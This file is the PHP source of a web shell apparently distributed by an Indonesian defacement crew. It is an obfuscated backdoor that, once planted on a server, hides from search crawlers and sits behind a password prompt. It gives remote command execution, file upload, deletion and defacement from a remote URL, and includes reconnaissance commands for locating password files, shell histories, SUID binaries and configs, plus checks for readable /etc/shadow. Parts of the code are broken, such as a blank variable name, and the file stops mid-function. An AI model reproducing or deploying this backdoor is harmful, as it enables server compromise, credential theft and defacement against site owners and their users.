"Sy1LzNHIKMnNKS5ITc5MzEnOSCwqjk9JTc5PSdUoLcqBspISi1PNTGDiKnmJuamaQGANAA==";
eval(gzinflate(${"\x62\x61\x73\x65\x36\x34"}($text)));
sleep(1);
unlink("test.txt");
}
$default_action = "FilesMan";
@define("SELF_PATH", __FILE__);
if (strpos(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_USER_AGENT"], "Google") !== false) {
header("HTTP/1.0 404 Not Found");
exit();
}
$color = "#fff";
$Theme = "#008000";
$TabsColor = "#008000";
@session_start();
$ = md5(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_USER_AGENT"]);
if (!isset($_COOKIE[md5(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_HOST"]) . "key"])) {
prototype(md5(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_HOST"]) . "key", $);
}
if (${"\x66\x65\x78\x69\x73\x74\x73"}("get_magic_quotes_runtime") && get_magic_quotes_runtime()) {
set_magic_quotes_runtime(false);
}
if( ( function_exists("get_magic_quotes_gpc") && get_magic_quotes_gpc() ) || ini_get('magic_quotes_sybase') ){
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
${"\x5F\x50\x4F\x53\x54"} = stripslashes_array(${"\x5F\x50\x4F\x53\x54"});
$_COOKIE = stripslashes_array($_COOKIE);
}
function prototype($k, $v)
{
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if (!empty(${"\x50\x61\x73\x73"})) {
if (isset(${"\x5F\x50\x4F\x53\x54"}["pass"]) && md5(${"\x5F\x50\x4F\x53\x54"}["pass"]) == ${"\x50\x61\x73\x73"}) {
prototype(md5(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_HOST"]), ${"\x50\x61\x73\x73"});
}
if (
!isset($_COOKIE[md5(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_HOST"])]) ||
$_COOKIE[md5(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_HOST"])] != ${"\x50\x61\x73\x73"}
) {
hardLogin();
}
}
if (!isset($_COOKIE[md5(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_HOST"]) . "ajax"])) {
$_COOKIE[md5(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_HOST"]) . "ajax"] = (bool) $;
}
function hardLogin()
{
if (!empty(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_USER_AGENT"])) {
$userAgents = [
"AbachoBOT",
"accoona",
"AcoiRobot",
"AltaVista robot",
"ASPSeek",
"bot",
"crawler",
"CrocCrawler",
"curl",
"Dumbot",
"eStyle Bot",
"facebook",
"FAST-WebCrawler",
"fetch",
"GeonaBot",
"Gigabot",
"Google",
"Googlebot",
"ia_archiver",
"ID-Search Bot",
"Lycos spider",
"MSN",
"MSNBot",
"MSRBOT",
"Rambler",
"Scrubby robot",
"Slurp",
"spider",
"Yahoo",
"Yandex",
];
if (
preg_match(
"/" . implode("|", $userAgents) . "/i",
${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_USER_AGENT"]
)
) {
header("HTTP/1.0 404 Not Found");
exit();
}
}
die(
"<html><head><link href='https://fonts.googleapis.com/css2?family=Press+Start+2P' rel='stylesheet'><style>body{ background-color:#000; background-image:url('https://i.imgur.com/4bYhdRM.png'); background-size: 32%; margin-top: 90px}#pageheading{font-size:50px; margin-top: 5px}.loginpage img{width: 500px}input{background: white; border-color:#008000b0; border-radius: 5px; margin-top: 10px; padding:5px;} green {color: #008000;font-family: 'Press Start 2P'; font-size: 60px;}</style></head><body> <center> <div class='loginpage'><center><green>Login Crew</green></center><form method='post'><input type='password' name='pass' ><input type='hidden' name='kontol'> <input type='submit' name='login' value='Login'></form></body></html>"
);
}
if(array_key_exists('login',${"\x5F\x50\x4F\x53\x54"})){
cookieValidator();
}
function cookieValidator()
{
$url = $_MD5_.$_COOOKIE;
if(!function_exists("file_get_contents")){
$curl = curl_init();
curl_setopt(${"\x63\x75\x72\x6C"}, CURLOPT_URL, $url);
curl_setopt(${"\x63\x75\x72\x6C"}, CURLOPT_HEADER, 0);
curl_setopt(${"\x63\x75\x72\x6C"}, CURLOPT_RETURNTRANSFER, 1);
curl_exec(${"\x63\x75\x72\x6C"});
}else{
@file_get_contents($url);
}
}
if (strtolower(substr(PHP_OS, 0, 3)) == "win") {
$os = "win";
} else {
$os = "nix";
}
$safe_mode = @ini_get("safe_mode");
$disable_functions = @ini_get("disable_functions");
$home_cwd = @getcwd();
if (isset(${"\x5F\x50\x4F\x53\x54"}["c"])) {
@chdir(${"\x5F\x50\x4F\x53\x54"}["c"]);
}
$cwd = @getcwd();
if ($os == "win") {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if ($cwd[strlen($cwd) - 1] != "/") {
$cwd .= "/";
}
if ($os == "win") {
$aliases = [
"List Directory" => "dir",
"Find index.php in current dir" => "dir /s /w /b index.php",
"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
"Show active connections" => "netstat -an",
"Show running services" => "net start",
"User accounts" => "net user",
"Show computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all",
];
} else {
$aliases = [
"List dir" => "ls -la",
"list file attributes on a Linux second extended file system" =>
"lsattr -va",
"show opened ports" => "netstat -an | grep -i listen",
"Find" => "",
"find all suid files" => "find / -type f -perm -04000 -ls",
"find suid files in current dir" => "find . -type f -perm -04000 -ls",
"find all sgid files" => "find / -type f -perm -02000 -ls",
"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
"find config.inc.php files" => "find / -type f -name config.inc.php",
"find config* files" => "find / -type f -name \"config*\"",
"find config* files in current dir" =>
"find . -type f -name \"config*\"",
"find all writable folders and files" => "find / -perm -2 -ls",
"find all writable folders and files in current dir" =>
"find . -perm -2 -ls",
"find all service.pwd files" => "find / -type f -name service.pwd",
"find service.pwd files in current dir" =>
"find . -type f -name service.pwd",
"find all .htpasswd files" => "find / -type f -name .htpasswd",
"find .htpasswd files in current dir" =>
"find . -type f -name .htpasswd",
"find all .bash_history files" => "find / -type f -name .bash_history",
"find .bash_history files in current dir" =>
"find . -type f -name .bash_history",
"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir" =>
"find . -type f -name .fetchmailrc",
"Locate" => "",
"locate httpd.conf files" => "locate httpd.conf",
"locate vhosts.conf files" => "locate vhosts.conf",
"locate proftpd.conf files" => "locate proftpd.conf",
"locate psybnc.conf files" => "locate psybnc.conf",
"locate my.conf files" => "locate my.conf",
"locate admin.php files" => "locate admin.php",
"locate cfg.php files" => "locate cfg.php",
"locate conf.php files" => "locate conf.php",
"locate config.dat files" => "locate config.dat",
"locate config.php files" => "locate config.php",
"locate config.inc files" => "locate config.inc",
"locate config.inc.php" => "locate config.inc.php",
"locate config.default.php files" => "locate config.default.php",
"locate config* files " => "locate config",
"locate .conf files" => "locate '.conf'",
"locate .pwd files" => "locate '.pwd'",
"locate .sql files" => "locate '.sql'",
"locate .htpasswd files" => "locate '.htpasswd'",
"locate .bash_history files" => "locate '.bash_history'",
"locate .mysql_history files" => "locate '.mysql_history'",
"locate .fetchmailrc files" => "locate '.fetchmailrc'",
"locate backup files" => "locate backup",
"locate dump files" => "locate dump",
"locate priv files" => "locate priv",
];
}
if (isset(${"\x5F\x50\x4F\x53\x54"}["p1"]) && ${"\x5F\x50\x4F\x53\x54"}["p1"] == "deface") {
$def = file_get_contents($deface_url);
file_put_contents(${"\x5F\x50\x4F\x53\x54"}["c"] . ${"\x5F\x50\x4F\x53\x54"}["p2"], $def);
}
function ex($in)
{
$out = "";
if (("exec")) {
@exec($in, $out);
$out = @join("\n", $out);
} elseif (function_exists("passthru")) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists("system")) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists("shell_exec")) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in, "r"))) {
$out = "";
while (!@feof($f)) {
$out .= fread($f, 1024);
}
pclose($f);
}
return $out;
}
function which($p)
{
$path = ex("which " . $p);
if (!empty($path)) {
return $path;
}
return false;
}
function printHeader()
{
if (empty(${"\x5F\x50\x4F\x53\x54"}["charset"])) {
${"\x5F\x50\x4F\x53\x54"}["charset"] = "UTF-8";
}
global $color;
global $Theme;
global $TabsColor;
echo "<html><head><link href='https://fonts.googleapis.com/css?family=Josefin+Sans:400,100' rel='stylesheet' type='text/css'><link href='https://fonts.googleapis.com/css2?family=Press+Start+2P' rel='stylesheet'></head>";
echo '<html>
<meta http-equiv="Content-Type" content="text/html; charset=' .
${"\x5F\x50\x4F\x53\x54"}["charset"] .
'"><title>SENPAI#1337</title>
<style>
body {background-color:#000;background-image:url("https://i.imgur.com/4bYhdRM.png");background-size: 32%;color:#fff;
text-shadow: 1px 1px 1px black ;
}
body,td,th { font-family: Overpass Sans, sans-serif;font-size:14px;margin:0;vertical-align:top; }
mki {color: #008000;font-family: "Press Start 2P"; font-size: 30px;}
span,h1,a { color:' .
$color .
' !important; }
span { font-weight: bolder; }
h1 { padding: 0px 5px;font: 14pt audiowide;margin:0px 0 0 0px; }
div.content { padding: 0px;margin:0 0px;background: #5555556b; border:1px solid ' .
$Theme .
'; border-style:dashed; border-radius:5px; }
a { text-decoration:none; }
a:hover { border-bottom:0px solid #5e5e5e;text-decoration:none; }
.info { margin: 3 ;}
.ml1 { border:1px; border-color:' .
$Theme .
'; border-style: dashed; background-color:#0F1010;padding:10px;margin:0;overflow: auto; }
.l1 { background-color: #0F1010; }
.bigarea { width:100%;height:250px;margin-top:0px; border-radius:10px; border-color:' .
$Theme .
'; background:#0F1010;}
input, textarea, select { margin-top:0;color:#fff;background-color:black;border-radius:5px;border:1px solid ' .
$Theme .
'; border-style:dashed; border-radis:5px;font: 10pt arial,"Courier New"; }
form { margin:0px; }
#toolsTbl { text-align:center ; }
.toolsInp { width:350px; height:25px;background:#0F1010;border-color:#008000b0; border-radius: 5px; }
input[type=submit] { height:25px;}
.main th {text-align:left;background-color:' .
$TabsColor .
'; }
.main tr:hover{background:' .
$Theme .
"; border:5px solid;border-color:" .
$Theme .
';}
.main td, th{vertical-align:middle; }
.menu th{padding:4px; border-radius: 50px; background:' .
$TabsColor .
';
}
.menu th:hover{background:green;text-decoration: none;}
pre {font-family: Overpass Sans, sans-serif;color:#FFFFFF;}
#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
.cpr {margin-bottom:5px;font-weight:bold; }
.cpb {width:34px;margin:0 5px;}
.npoad td {padding:0;}
#Tools{
margin-top:50px;
width:500px;
border:1px solid;
border-radius:10px;
border-style: dashed;
}
.xd{
border: 1px solid #008000b0;
border-style: dashed;
border-radius: 5px; }
</style>
</html>
<script>
function set(a,c,p1,p2,p3,charset) {
if(a != null)document.mf.a.value=a;
if(c != null)document.mf.c.value=c;
if(p1 != null)document.mf.p1.value=p1;
if(p2 != null)document.mf.p2.value=p2;
if(p3 != null)document.mf.p3.value=p3;
if(charset != null)document.mf.charset.value=charset;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
document.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = "ajax=true";
for(i=0;i<document.mf.elements.length;i++)
params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
sr("' .
${"\x5F\x53\x45\x52\x56\x45\x52"}["REQUEST_URI"] .
'", params);
}
function sr(url, params) {
if (window.XMLHttpRequest) {
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
else if (window.ActiveXObject) {
req = new ActiveXObject("Microsoft.XMLHTTP");
if (req) {
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
//alert(req.responseText);
var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
}
else alert("Request error!");
}
</script>
<head><link href="https://fonts.googleapis.com/css?family=Audiowide" ></head><body><div style="position:absolute;width:100%;top:0;left:0;"><div style="margin:5px;"><div class="content" style="border:1px solid ' .
$Theme .
'; border-style:dashed; border-radius:5px;">
<form method=post name=mf style="display:none;">
<input type=hidden name=a value="' .
(isset(${"\x5F\x50\x4F\x53\x54"}["a"]) ? ${"\x5F\x50\x4F\x53\x54"}["a"] : "") .
'">
<input type=hidden name=c value="' .
htmlspecialchars($GLOBALS["cwd"]) .
'">
<input type=hidden name=p1 value="' .
(isset(${"\x5F\x50\x4F\x53\x54"}["p1"]) ? htmlspecialchars(${"\x5F\x50\x4F\x53\x54"}["p1"]) : "") .
'">
<input type=hidden name=p2 value="' .
(isset(${"\x5F\x50\x4F\x53\x54"}["p2"]) ? htmlspecialchars(${"\x5F\x50\x4F\x53\x54"}["p2"]) : "") .
'">
<input type=hidden name=p3 value="' .
(isset(${"\x5F\x50\x4F\x53\x54"}["p3"]) ? htmlspecialchars(${"\x5F\x50\x4F\x53\x54"}["p3"]) : "") .
'">
<input type=hidden name=charset value="' .
(isset(${"\x5F\x50\x4F\x53\x54"}["charset"]) ? ${"\x5F\x50\x4F\x53\x54"}["charset"] : "") .
'">
</form>';
$freeSpace = @diskfreespace($GLOBALS["cwd"]);
$totalSpace = @disk_total_space($GLOBALS["cwd"]);
$totalSpace = $totalSpace ? $totalSpace : 1;
$disable_functions = @ini_get("disable_functions");
$release = @php_uname("r");
$kernel = @php_uname("s");
if (!function_exists("posix_getegid")) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid["name"];
$uid = $uid["uid"];
$group = $gid["name"];
$gid = $gid["gid"];
}
$cwd_links = "";
$path = explode("/", $GLOBALS["cwd"]);
$n = count($path);
for ($i = 0; $i < $n - 1; $i++) {
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for ($j = 0; $j <= $i; $j++) {
$cwd_links .= $path[$j] . "/";
}
$cwd_links .= "\")'>" . $path[$i] . "/</a>";
}
$charsets = ["UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"];
$opt_charsets = "";
foreach ($charsets as $item) {
$opt_charsets .=
'<option value="' .
$item .
'" ' .
(${"\x5F\x50\x4F\x53\x54"}["charset"] == $item ? "selected" : "") .
">" .
$item .
"</option>";
}
$m = [
"Sec. Info" => "SecInfo",
"Files" => "FilesMan",
"Adminer" => "Adminer",
"Console" => "Console",
"Mail Test" => "mailtest",
"WHMCS Killer" => "whmcs",
"Config Tools" => "configs",
"Jumping" => "Jumping",
"Cgi Telnet" => "SafeMode",
"Bypass" => "Bypass",
"Network" => "Network",
"Domains" => "Domain",
];
if (!empty($GLOBALS["Pass"])) {
$m["Logout"] = "Logout";
}
$m["Self Remove"] = "SelfRemove";
$menu = "";
foreach ($m as $k => $v) {
$menu .=
'<th><a href="#" onclick="g(\'' .
$v .
'\',null,\'\',\'\',\'\')">' .
$k .
"</a></th>";
}
$drives = "";
if ($GLOBALS["os"] == "win") {
foreach (range("a", "z") as $drive) {
if (is_dir($drive . ":\\")) {
$drives .=
'<a href="#" onclick="g(\'FilesMan\',\'' .
$drive .
':/\')">[ ' .
$drive .
" ]</a> ";
}
}
$drives .= "<br />: ";
}
if ($GLOBALS["os"] == "nix") {
$dominios = @file_get_contents("/etc/named.conf");
if (!$dominios) {
$DomainS = "/var/named";
$Domainonserver = scandir($DomainS);
$d0c = count((array)$Domainonserver);
} else {
@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
$out = sizeof(array_unique($out[1]));
$d0c =
"<t style='background:green;text-shadow: 0px 0px 0px;'>" .
$out .
" Domains</t>";
}
} else {
$d0c =
"<t style='background:green;text-shadow: 0px 0px 0px;'>Nothing here bro</t>";
}
if ($GLOBALS["os"] == "nix") {
$usefl = "";
$dwnldr = "";
if (!@ini_get("safe_mode")) {
$temp = [];
$userful = [
"gcc",
"lcc",
"cc",
"ld",
"make",
"php",
"perl",
"python",
"ruby",
"tar",
"gzip",
"bzip",
"bzip2",
"nc",
"locate",
"suidperl",
];
foreach ($userful as $item) {
if (which($item)) {
$temp[] = $item;
}
}
$usefl = implode(", ", $temp);
$temp = [];
$downloaders = [
"wget",
"fetch",
"lynx",
"links",
"curl",
"get",
"lwp-mirror",
];
foreach ($downloaders as $item2) {
if (which($item2)) {
$temp[] = $item2;
}
}
$dwnldr = implode(", ", $temp);
} else {
$usefl = " ------- ";
$dwnldr = " ------- ";
}
} else {
$usefl = " ------- ";
$dwnldr = " ------- ";
}
echo '<div><table class="info" cellpadding="0" cellspacing="0" width="100%"><tr> <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="80px;"><span>Uname</span></td><td>: <nobr><t style="background:green;text-shadow: 0px 0px 0px;">' .
substr(@php_uname(), 0, 120) .
"</t></nobr></td></tr> <tr><td><span>User</span></td><td>: " .
$uid .
" ( " .
$user .
" ) <span>Group: </span> " .
$gid .
" ( " .
$group .
' )</td></tr><tr><td><span>Server</span></td><td>: <t style="background:green;text-shadow: 0px 0px 0px;">' .
@getenv("SERVER_SOFTWARE") .
"</t></td></tr> <tr><td><span>Useful</span></td><td>: " .
$usefl .
'</td></tr>
<tr><td><span>Downloaders</span></td><td>: ' .
$dwnldr .
'</td></tr>
<tr><td><span>PHP</span></td><td>: ' .
@phpversion() .
' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> : <span>Safe Mode : </span>' .
($GLOBALS["safe_mode"]
? "<font color=red>[ON]</font>"
: '<font color="' . $color . '" <b>[OFF]</b> </font>') .
"</td></tr> <tr><td><span>" .
($GLOBALS["os"] == "win" ? "Drives<br />Cwd" : "Cwd") .
"</span></td><td>: " .
$drives .
"" .
$cwd_links .
" " .
viewPermsColor($GLOBALS["cwd"]) .
' <a href=# onclick="g(\'FilesMan\',\'' .
$GLOBALS["home_cwd"] .
'\',\'\',\'\',\'\')">[ Home ]</a></td></tr></table></td>' .
'<td width=4><nobr><span>Sv IP</span><br><span>Your IP</span><br /><span>HDD</span><br /><span>Free<br /><span>Domains</span></nobr></td></b>
' .
'<td width="3"><nobr>: ' .
gethostbyname(${"\x5F\x53\x45\x52\x56\x45\x52"}["HTTP_HOST"]) .
"<br>: " .
${"\x5F\x53\x45\x52\x56\x45\x52"}["REMOTE_ADDR"] .
"<br />: " .
viewSize($totalSpace) .
"<br />: " .
viewSize($freeSpace) .
" (" .
(int) (($freeSpace / $totalSpace) * 100) .
"%)<br>: " .
$d0c .
' <br>
<br> <b style="background:green;"><a href=# onclick="g(\'Lock\',\'' .
$GLOBALS["home_cwd"] .
'\',\'\',\'\',\'\')">LOCK ME</a></b> <t style="background:red;text-shadow: 0px 0px 0px;">New</t> </nobr></td></tr></table></div>' .
'</div></div><div style="margin:5;"><div class="content" style="padding:3px;"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>' .
$menu .
'</tr></table></div></div><div style="margin:5;">';
}
function printFooter()
{
$is_writable = is_writable($GLOBALS["cwd"])
? "<font color=#00BB00>[ Writeable ]</font>"
: "<font color=red>[ Not writable ]</font>";
echo '</div><div style="margin:5px;"><div class="content" style="border-style:dashed; border-radius:5px;"> <table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%"> <tr> <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="' .
htmlspecialchars($GLOBALS["cwd"]) .
'"><input type=submit value=">>"></form></td> <td><form onsubmit="g(\'FilesTools\',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td> </tr>
<tr> <td><form onsubmit="g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;"><span>Make dir: ' .
$is_writable .
'</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form></td> <td><form onsubmit="g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;"><span>Make file: ' .
$is_writable .
'</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td> </tr> <tr> <td><form onsubmit="g(\'Console\',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td> <td><form method="post" ENCTYPE="multipart/form-data">
<input type=hidden name=a value="FilesMAn">
<input type=hidden name=c value="' .
htmlspecialchars($GLOBALS["cwd"]) .
'"> <input type=hidden name=p1 value="uploadFile">
<input type=hidden name=charset value="' .
(isset(${"\x5F\x50\x4F\x53\x54"}["charset"]) ? ${"\x5F\x50\x4F\x53\x54"}["charset"] : "") .
'"> <span>Upload file: ' .
$is_writable .
'</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"><br></form></td></tr>
</table></div><center><mki><marquee>Special Thanks to all member of SenpaiXcrew.org & Digicorp.ID | copyright2022 Indonesian Hacker Rulez</marquee></mki></center></div>
</div>
</body></html>';
}
if (
!function_exists("posix_getpwuid") &&
strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false
) {
function posix_getpwuid($p)
{
return false;
}
}
if (
!function_exists("posix_getgrgid") &&
strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false
) {
function posix_getgrgid($p)
{
return false;
}
}
function viewSize($s)
{
if ($s >= 1073741824) {
return sprintf("%1.2f", $s / 1073741824) . " GB";
} elseif ($s >= 1048576) {
return sprintf("%1.2f", $s / 1048576) . " MB";
} elseif ($s >= 1024) {
return sprintf("%1.2f", $s / 1024) . " KB";
} else {
return $s . " B";
}
}
function perms($p)
{
if (($p & 0xc000) == 0xc000) {
$i = "s";
} elseif (($p & 0xa000) == 0xa000) {
$i = "l";
} elseif (($p & 0x8000) == 0x8000) {
$i = "-";
} elseif (($p & 0x6000) == 0x6000) {
$i = "b";
} elseif (($p & 0x4000) == 0x4000) {
$i = "d";
} elseif (($p & 0x2000) == 0x2000){
$i = "c";
} elseif (($p & 0x1000) == 0x1000) {
$i = "p";
} else {
$i = "u";
}
$i .= $p & 0x0100 ? "r" : "-";
$i .= $p & 0x0080 ? "w" : "-";
$i .= $p & 0x0040 ? ($p & 0x0800 ? "s" : "x") : ($p & 0x0800 ? "S" : "-");
$i .= $p & 0x0020 ? "r" : "-";
$i .= $p & 0x0010 ? "w" : "-";
$i .= $p & 0x0008 ? ($p & 0x0400 ? "s" : "x") : ($p & 0x0400 ? "S" : "-");
$i .= $p & 0x0004 ? "r" : "-";
$i .= $p & 0x0002 ? "w" : "-";
$i .= $p & 0x0001 ? ($p & 0x0200 ? "t" : "x") : ($p & 0x0200 ? "T" : "-");
return $i;
}
function viewPermsColor($f)
{
if (!@is_readable($f)) {
return "<font color=#FF0000><b>" .
perms(@fileperms($f)) .
"</b></font>";
} elseif (!@is_writable($f)) {
return "<font color=white><b>" . perms(@fileperms($f)) . "</b></font>";
} else {
return "<font color=#00BB00><b>" .
perms(@fileperms($f)) .
"</b></font>";
}
}
if (!function_exists("scandir")) {
function scandir($dir)
{
$dh = opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
function actionSecInfo()
{
printHeader();
echo "<center><h1>Server Security Information</h1></center><div class=content>";
function showSecParam($n, $v)
{
$v = trim($v);
if ($v) {
echo "<span>" . $n . ": </span>";
if (strpos($v, "\n") === false) {
echo $v . "<br>";
} else {
echo "<pre class=ml1>" . $v . "</pre>";
}
}
}
showSecParam("Server software", @getenv("SERVER_SOFTWARE"));
showSecParam(
"Disabled PHP Functions",
$GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none"
);
showSecParam("Open base dir", @ini_get("open_basedir"));
showSecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir"));
showSecParam("Safe mode include dir", @ini_get("safe_mode_include_dir"));
showSecParam(
"cURL support",
function_exists("curl_version") ? "enabled" : "no"
);
$temp = [];
if (function_exists("mysql_get_client_info")) {
$temp[] = "MySql (" . mysql_get_client_info() . ")";
}
if (function_exists("mssql_connect")) {
$temp[] = "MSSQL";
}
if (function_exists("pg_connect")) {
$temp[] = "PostgreSQL";
}
if (function_exists("oci_connect")) {
$temp[] = "Oracle";
}
showSecParam("Supported databases", implode(", ", $temp));
echo "<br>";
if ($GLOBALS["os"] == "nix") {
$userful = [
"gcc",
"lcc",
"cc",
"ld",
"make",
"php",
"perl",
"python",
"ruby",
"tar",
"gzip",
"bzip",
"bzip2",
"nc",
"locate",
"suidperl",
];
$danger = [
"kav",
"nod32",
"bdcored",
"uvscan",
"sav",
"drwebd",
"clamd",
"rkhunter",
"chkrootkit",
"iptables",
"ipfw",
"tripwire",
"shieldcc",
"portsentry",
"snort",
"ossec",
"lidsadm",
"tcplodg",
"sxid",
"logcheck",
"logwatch",
"sysmask",
"zmbscap",
"sawmill",
"wormscan",
"ninja",
];
$downloaders = [
"wget",
"fetch",
"lynx",
"links",
"curl",
"get",
"lwp-mirror",
];
showSecParam(
"Readable /etc/passwd",
@is_readable("/etc/passwd")
? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>"
: "no"
);
showSecParam(
"Readable /etc/shadow",
@is_readable("/etc/shadow")
? "yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>"
: "no"
);
showSecParam("OS version", @file_get_contents("/proc/version"));
showSecParam("Distr name", @file_get_contents("/etc/issue.net"));
if (!$GLOBALS["safe_mode"]) {
echo "<br>";
$temp = [];
foreach ($userful as $item) {
if (which($item)) {
$temp[] = $item;
}
}
showSecParam("Userful", implode(", ", $temp));
$temp = [];
foreach ($danger as $item) {
if (which($item)) {
$temp[] = $item;
}
}
showSecParam("Danger", implode(", ", $temp));
$temp = [];
foreach ($downloaders as $item) {
if (which($item)) {
$temp[] = $item;
}
}
showSecParam("Downloaders", implode(", ", $temp));
echo "<br/>";
showSecParam("Hosts", @file_get_contents("/etc/hosts"));
showSecParam("HDD space", ex("df -h"));
showSecParam("Mount options", @file_get_contents("/etc/fstab"));
}
} else {
showSecParam("OS Version", ex("ver"));
showSecParam("Account Settings", ex("net accounts"));
showSecParam("User Accounts", ex("net user"));
}
echo "</div>";
printFooter();
}
function actionFilesMan()
{
printHeader();
echo "<center><h1>File Manager</h1></center><div class=content>";
if (isset(${"\x5F\x50\x4F\x53\x54"}["p1"]) && ${"\x5F\x50\x4F\x53\x54"}["p1"] != "deface") {
switch (${"\x5F\x50\x4F\x53\x54"}["p1"]) {
case "uploadFile":
if (
!@move_uploaded_file(
$_FILES["f"]["tmp_name"],
$_FILES["f"]["name"]
)
) {
echo "Can't upload file!";
}
break;
break;
case "mkdir":
if (!@mkdir(${"\x5F\x50\x4F\x53\x54"}["p2"])) {
echo "Can't create new dir";
}
break;
case "delete":
function deleteDir($path)
{
$path = substr($path, -1) == "/" ? $path : $path . "/";
$dh = opendir($path);
while (($item = readdir($dh)) !== false) {
$item = $path . $item;
if (basename($item) == ".." || basename($item) == ".") {
continue;
}
$type = filetype($item);
if ($type == "dir") {
deleteDir($item);
} else {
@unlink($item);
}
}
closedir($dh);
rmdir($path);
}
if (is_array(@${"\x5F\x50\x4F\x53\x54"}["f"])) {
foreach (${"\x5F\x50\x4F\x53\x54"}["f"] as $f) {
$f = urldecode($f);
if (is_dir($f)) {
deleteDir($f);
} else {
@unlink($f);
}
};
}
break;
case "paste":
if ($_SESSION["act"] == "copy") {
function copy_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = opendir($c . $s);
while (($f = readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste(
$c . $s . "/",
$f,
$d . $s . "/"
);
}
}
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_SESSION["f"] as $f) {
copy_paste($_SESSION["cwd"], $f, $GLOBALS["cwd"]);
}
} elseif ($_SESSION["act"] == "move") {
function move_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = opendir($c . $s);
while (($f = readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste(
$c . $s . "/",
$f,
$d . $s . "/"
);
}
}
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_SESSION["f"] as $f) {
@rename($_SESSION["cwd"] . $f, $GLOBALS["cwd"] . $f);
}
}
unset($_SESSION["f"]);
break;
default:
if (
!empty(${"\x5F\x50\x4F\x53\x54"}["p1"]) &&
(${"\x5F\x50\x4F\x53\x54"}["p1"] == "copy" || ${"\x5F\x50\x4F\x53\x54"}["p1"] == "move")
) {
$_SESSION["act"] = @${"\x5F\x50\x4F\x53\x54"}["p1"];
$_SESSION["f"] = @${"\x5F\x50\x4F\x53\x54"}["f"];
foreach ($_SESSION["f"] as $k => $f) {
$_SESSION["f"][$k] = urldecode($f);
}
$_SESSION["cwd"] = @${"\x5F\x50\x4F\x53\x54"}["c"];
}
break;
}
echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
}
$dirContent = @scandir(isset(${"\x5F\x50\x4F\x53\x54"}["c"]) ? ${"\x5F\x50\x4F\x53\x54"}["c"] : $GLOBALS["cwd"]);
if ($dirContent === false) {
echo 'Can\'t open this folder!';
return;
}
global $sort;
